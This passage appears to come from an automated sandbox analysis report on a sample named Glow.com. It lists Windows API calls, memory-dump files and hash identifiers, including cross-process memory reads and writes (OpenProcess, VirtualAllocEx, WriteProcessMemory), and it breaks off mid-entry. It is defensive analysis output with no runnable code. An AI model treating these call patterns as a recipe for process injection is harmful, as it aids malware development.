                                                                                                                                                                            • Part of subcall function 003EBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E2B1D,?,?,00000034,00000800,?,00000034), ref: 003EBDF4
                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003E30AD
                                                                                                                                                                            • Part of subcall function 003EBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 003EBDBF
                                                                                                                                                                            • Part of subcall function 003EBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 003EBD1C
                                                                                                                                                                            • Part of subcall function 003EBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 003EBD2C
                                                                                                                                                                            • Part of subcall function 003EBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 003EBD42
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E311A
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E3167
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                          • Opcode ID: fa4bca23bc4db31911e35c8dea0e34f07ac47fc4a864849c66e9a4f3b9866df5
                                                                                                                                                                          • Instruction ID: d339a20a37986f3e305b62d445c6c269289b9e35d557cfd9b5247564c5991346
                                                                                                                                                                          • Opcode Fuzzy Hash: fa4bca23bc4db31911e35c8dea0e34f07ac47fc4a864849c66e9a4f3b9866df5
                                                                                                                                                                          • Instruction Fuzzy Hash: 58413D72900268BEDB12DFA5CC45ADEB7B8EF45700F104195F955BB180DB706F85CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\600044\Glow.com,00000104), ref: 003B1AD9
                                                                                                                                                                          • _free.LIBCMT ref: 003B1BA4
                                                                                                                                                                          • _free.LIBCMT ref: 003B1BAE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                          • API String ID: 2506810119-3012505560
                                                                                                                                                                          • Opcode ID: 2c4810831764f1e7bccf5a311fb46ba9d7f163bb5838fac18f54e855ad80730f
                                                                                                                                                                          • Instruction ID: 04b2660fca66c2fc16618d594db3a6224892f6d663b2bf63ee2db269ee2fc688
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c4810831764f1e7bccf5a311fb46ba9d7f163bb5838fac18f54e855ad80730f
                                                                                                                                                                          • Instruction Fuzzy Hash: CF318371A00218AFCB22DB99CC91DDFBBBCEB85714B5141A6F9049B611E7B09E40C790
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003ECBB1
                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 003ECBF7
                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004529C0,01395910), ref: 003ECC40
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                          • Opcode ID: 02bb8fab855071beac885a789d1872d9fecd9bb80314c645f7aa1e4b282fc47a
                                                                                                                                                                          • Instruction ID: d3c0501864bffdf7c0bef2c2957db71922b7ab9f78be35852749df74d50d3057
                                                                                                                                                                          • Opcode Fuzzy Hash: 02bb8fab855071beac885a789d1872d9fecd9bb80314c645f7aa1e4b282fc47a
                                                                                                                                                                          • Instruction Fuzzy Hash: C041D0712143929FD722DF25C884B5EBBE8AF84B20F14461DF4A59B2D1C730A906CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041DCD0,00000000,?,?,?,?), ref: 00414F48
                                                                                                                                                                          • GetWindowLongW.USER32 ref: 00414F65
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00414F75
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                          • Opcode ID: a84da7f01d1c40c87ce9ef104c8df9d479162c733327903846d1ccf7c3b347fa
                                                                                                                                                                          • Instruction ID: ce2bd8384f838928463639da3e7b33c2d84ee29684c8cd3f402ab0987dd76763
                                                                                                                                                                          • Opcode Fuzzy Hash: a84da7f01d1c40c87ce9ef104c8df9d479162c733327903846d1ccf7c3b347fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 3531AF71604205AFDB219E78CC45BDB77A9EB48334F204726F979A22E0C778EC919758
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00403AD4,?,?), ref: 00403DD5
                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00403AF8
                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00403B63
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                          • Opcode ID: 654e3a8e96ce3fd56f0a3c7d91a8bdb4a64e7c3bce875e02a78eeaab27d1ddc2
                                                                                                                                                                          • Instruction ID: d4cf06aee8d3f90ace252ecbedfa888c33064ea12016f18f267bd7704df006f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 654e3a8e96ce3fd56f0a3c7d91a8bdb4a64e7c3bce875e02a78eeaab27d1ddc2
                                                                                                                                                                          • Instruction Fuzzy Hash: 4231B2396002019FCB10DF68C485EAA7BF8EF14319F24816AE8169B3D3D739EE46C764
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004149DC
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004149F0
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00414A14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                          • Opcode ID: 9c7cde0dece73e059c5148daa096c4bf7f7aa63cabc08de533924665457f0e04
                                                                                                                                                                          • Instruction ID: 42d73c52eea83ad18483a8267e3250f960052fb526c7e9951818502d39134329
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c7cde0dece73e059c5148daa096c4bf7f7aa63cabc08de533924665457f0e04
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21F172610219BBDF118FA0CC42FEF3B69EF88728F110215FA156B1D0D6B5E891CB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004151A3
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004151B1
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004151B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                          • Opcode ID: 8819058a6156422d813aa557cbd650a015a8be90e4671f8ac08b4c1cab595ed8
                                                                                                                                                                          • Instruction ID: d5d16722ecb1ba338ef3687d003e3dbc602ac1b902d4aca6daddafbc9747a0fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 8819058a6156422d813aa557cbd650a015a8be90e4671f8ac08b4c1cab595ed8
                                                                                                                                                                          • Instruction Fuzzy Hash: A9214FB5A00609BFDB11DF54CC81EE737ADEB9A364B14015AF9009B361CA74EC51CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004142DC
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004142EC
                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00414312
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                          • Opcode ID: a0c9d7f18d7cf7d0cf65d76589af8d4086ab08cafb472a7d8ddabc9e1abd882d
                                                                                                                                                                          • Instruction ID: a9161489c995da7e455ec94ec42c325b7f0fd8a71f86ba7c33df65a0ad6e4862
                                                                                                                                                                          • Opcode Fuzzy Hash: a0c9d7f18d7cf7d0cf65d76589af8d4086ab08cafb472a7d8ddabc9e1abd882d
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21B032600218BBEB118F94CC85FEB376EEBC97A4F118125F9149B290C6759C9287A4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 003F544D
                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003F54A1
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,0041DCD0), ref: 003F5515
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                          • Opcode ID: faf89eee9570c5a6f29dc6aac4cf5c5e2e26932becfe0373cea11bdf553eaabc
                                                                                                                                                                          • Instruction ID: b5a7debc1e9f35bd3a9adcb5428a84be347a02c0dbf45d9c2539e0509ca42ec1
                                                                                                                                                                          • Opcode Fuzzy Hash: faf89eee9570c5a6f29dc6aac4cf5c5e2e26932becfe0373cea11bdf553eaabc
                                                                                                                                                                          • Instruction Fuzzy Hash: E1318271A00209AFDB11EF54C885EAAB7F8EF05304F1580A9F509DF262DB71EE45CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetActiveWindow.USER32 ref: 00418339
                                                                                                                                                                          • EnumChildWindows.USER32(?,0041802F,00000000), ref: 004183B0
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                          • String ID: (E$(E
                                                                                                                                                                          • API String ID: 3814560230-3237547482
                                                                                                                                                                          • Opcode ID: 1b64f0178dd6476ec7f330df080bd0985d6b82a69787b61b5b31fb85869c42f6
                                                                                                                                                                          • Instruction ID: ce5561989f59138debed0b978d56c037fb24a4a9de8473d8d1224f070b781856
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b64f0178dd6476ec7f330df080bd0985d6b82a69787b61b5b31fb85869c42f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B217AB5200705CFC720DF28D840A96B7E5FB4A721F24072EE875C73A1DBB1A840CBA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00414CED
                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00414D02
                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00414D0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                          • Opcode ID: bdd70cf0244c6d2d559249bfde4fc5f62ae14b066b0e7223310df6120a2fa846
                                                                                                                                                                          • Instruction ID: 495a3e67a67b9d5a8bc3fdb3b539548e0a4ad7d36aff1bda902ab63c9e18fd82
                                                                                                                                                                          • Opcode Fuzzy Hash: bdd70cf0244c6d2d559249bfde4fc5f62ae14b066b0e7223310df6120a2fa846
                                                                                                                                                                          • Instruction Fuzzy Hash: D7113671240208BEEF205F65DC06FEB37A8EFC5B64F11012AFA50E21A0D275DC91DB58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                            • Part of subcall function 003E36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E3712
                                                                                                                                                                            • Part of subcall function 003E36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3723
                                                                                                                                                                            • Part of subcall function 003E36F4: GetCurrentThreadId.KERNEL32 ref: 003E372A
                                                                                                                                                                            • Part of subcall function 003E36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E3731
                                                                                                                                                                          • GetFocus.USER32 ref: 003E38C4
                                                                                                                                                                            • Part of subcall function 003E373B: GetParent.USER32(00000000), ref: 003E3746
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 003E390F
                                                                                                                                                                          • EnumChildWindows.USER32(?,003E3987), ref: 003E3937
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                          • Opcode ID: 6f1d9104505ec5fc0a5a79ad83f1b452defd748bd1b147146d7cd577a77d8cb6
                                                                                                                                                                          • Instruction ID: 7c5f0be3c65a826e4ec38174d66596bf030401bf1047ad79679e76d5644f7185
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f1d9104505ec5fc0a5a79ad83f1b452defd748bd1b147146d7cd577a77d8cb6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7611D2B5A002556BCF12BF758C89BED77AAAF94300F008079B9099F293DF7099058B20
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00385A34
                                                                                                                                                                          • DestroyWindow.USER32(?,003837B8,?,?,?,?,?,00383709,?,?), ref: 00385A91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                          • String ID: <)E$<)E
                                                                                                                                                                          • API String ID: 2587070983-47095286
                                                                                                                                                                          • Opcode ID: a63a8677faa60ca10d0803dbf40ac42ac912d0170b996d69fe4d8948d81086f1
                                                                                                                                                                          • Instruction ID: 149f87ecb6b54d1d5d4d6d97641ba6d82cdf278979b3293879703bf8e2b6ca12
                                                                                                                                                                          • Opcode Fuzzy Hash: a63a8677faa60ca10d0803dbf40ac42ac912d0170b996d69fe4d8948d81086f1
                                                                                                                                                                          • Instruction Fuzzy Hash: F22130B1306B01CFDB1BAB15EA94B2537E5B746312F0541AEE8019B372CBB8DC44CB48
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00416360
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0041638D
                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 0041639C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                          • Opcode ID: 3d64c2b97732c73b64032ca8aa33cd82941628aa05dc4aa95c492b98224ddaa0
